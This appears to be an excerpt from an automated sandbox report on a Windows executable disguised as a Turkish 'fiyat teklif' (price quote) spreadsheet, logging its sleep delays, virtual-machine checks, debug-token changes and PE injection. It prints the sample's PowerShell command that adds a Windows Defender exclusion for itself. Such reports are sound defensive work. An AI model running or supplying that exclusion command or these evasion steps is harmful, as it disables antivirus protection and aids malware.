Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 598463	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 598237	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 597996	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 597887	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 597668	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 597562	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 597453	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 597343	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 597228	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 597125	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 597015	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 596905	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 596796	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 596687	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 596576	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 596468	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 596359	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 596250	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 596140	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 596031	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 595921	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 595812	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 595703	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 595592	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 595484	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 595283	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 595156	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 595030	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 594920	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 594812	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 594593	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 594484	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7794	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1909	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Window / User API: threadDelayed 1984	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Window / User API: threadDelayed 7874	Jump to behavior

Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe TID: 2992	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7280	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe TID: 7368	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe TID: 7368	Thread sleep time: -29514790517935264s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe TID: 7368	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe TID: 7372	Thread sleep count: 1984 > 30	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe TID: 7368	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe TID: 7372	Thread sleep count: 7874 > 30	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe TID: 7368	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe TID: 7368	Thread sleep time: -599672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe TID: 7368	Thread sleep time: -599562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe TID: 7368	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe TID: 7368	Thread sleep time: -599343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe TID: 7368	Thread sleep time: -599234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe TID: 7368	Thread sleep time: -599125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe TID: 7368	Thread sleep time: -599015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe TID: 7368	Thread sleep time: -598906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe TID: 7368	Thread sleep time: -598797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe TID: 7368	Thread sleep time: -598687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe TID: 7368	Thread sleep time: -598576s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe TID: 7368	Thread sleep time: -598463s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe TID: 7368	Thread sleep time: -598359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe TID: 7368	Thread sleep time: -598237s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe TID: 7368	Thread sleep time: -598110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe TID: 7368	Thread sleep time: -597996s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe TID: 7368	Thread sleep time: -597887s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe TID: 7368	Thread sleep time: -597781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe TID: 7368	Thread sleep time: -597668s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe TID: 7368	Thread sleep time: -597562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe TID: 7368	Thread sleep time: -597453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe TID: 7368	Thread sleep time: -597343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe TID: 7368	Thread sleep time: -597228s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe TID: 7368	Thread sleep time: -597125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe TID: 7368	Thread sleep time: -597015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe TID: 7368	Thread sleep time: -596905s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe TID: 7368	Thread sleep time: -596796s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe TID: 7368	Thread sleep time: -596687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe TID: 7368	Thread sleep time: -596576s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe TID: 7368	Thread sleep time: -596468s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe TID: 7368	Thread sleep time: -596359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe TID: 7368	Thread sleep time: -596250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe TID: 7368	Thread sleep time: -596140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe TID: 7368	Thread sleep time: -596031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe TID: 7368	Thread sleep time: -595921s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe TID: 7368	Thread sleep time: -595812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe TID: 7368	Thread sleep time: -595703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe TID: 7368	Thread sleep time: -595592s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe TID: 7368	Thread sleep time: -595484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe TID: 7368	Thread sleep time: -595283s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe TID: 7368	Thread sleep time: -595156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe TID: 7368	Thread sleep time: -595030s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe TID: 7368	Thread sleep time: -594920s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe TID: 7368	Thread sleep time: -594812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe TID: 7368	Thread sleep time: -594703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe TID: 7368	Thread sleep time: -594593s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe TID: 7368	Thread sleep time: -594484s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 598797	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 598576	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 598463	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 598237	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 597996	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 597887	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 597668	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 597562	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 597453	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 597343	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 597228	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 597125	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 597015	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 596905	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 596796	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 596687	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 596576	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 596468	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 596359	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 596250	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 596140	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 596031	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 595921	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 595812	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 595703	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 595592	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 595484	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 595283	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 595156	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 595030	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 594920	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 594812	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 594593	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Thread delayed: delay time: 594484	Jump to behavior

Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000000.00000002.1713336778.0000000000CB6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe, 00000003.00000002.4108402068.0000000000F77000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe"
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe"			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe

Memory written: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe"			Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Process created: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe "C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe"			Jump to behavior

Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
